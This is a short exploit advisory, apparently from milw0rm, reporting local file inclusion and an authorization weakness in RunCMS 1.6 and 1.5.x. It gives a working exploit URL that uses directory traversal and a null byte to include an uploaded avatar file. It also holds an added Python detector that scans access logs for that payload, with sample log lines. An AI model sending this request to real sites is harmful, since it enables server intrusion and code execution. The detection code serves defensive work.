Vendor: http://www.runcms.org/
Bugs: Local File Inclusion, Modules Authorization Weakness
Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x (prior versions also may be affected)
Exploitation: Remote with browser
Exploit: Available
Fix Available: No!
exp:
http://site.com/runcms_1.6/modules/news/?xoopsOption[pagetype]=../../images/avatar/users/[uid].gif%00
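Detection sketch for the request above (an added example, not part of the original advisory): it scans web access log lines for a `xoopsOption[pagetype]` value that contains directory traversal or a null byte after percent-decoding. The combined log format, the sample lines, the uid `7` and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

PARAM = "xoopsOption[pagetype]"  # parameter name taken from the advisory's request
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /runcms_1.6/modules/news/'
    '?xoopsOption[pagetype]=../../images/avatar/users/7.gif%00 HTTP/1.1" 200 5120',
    '192.0.2.12 - - [01/Jan/2008:10:00:09 +0000] "GET /runcms_1.6/modules/news/'
    '?xoopsOption%5Bpagetype%5D=%252e%252e%252fimages HTTP/1.1" 200 5120',
    '192.0.2.13 - - [01/Jan/2008:10:00:12 +0000] "GET /runcms_1.6/modules/news/'
    '?xoopsOption[pagetype]=news HTTP/1.1" 200 8421',
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_reasons(target):
    """Reasons a request target looks like traversal through the pagetype parameter."""
    reasons = []
    # parse_qsl already decodes one layer of percent-encoding in names and values.
    for name, value in parse_qsl(target.partition("?")[2], keep_blank_values=True):
        if decode_fully(name) != PARAM:
            continue
        value = decode_fully(value)
        if TRAVERSAL_RE.search(value) and "path traversal" not in reasons:
            reasons.append("path traversal")
        if "\x00" in value and "null byte" not in reasons:
            reasons.append("null byte")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        reasons = suspicious_reasons(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits
```

Calling `scan(SAMPLE_LOG)` flags the first two constructed lines and leaves the plain `pagetype=news` request alone.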
©milw0rm.com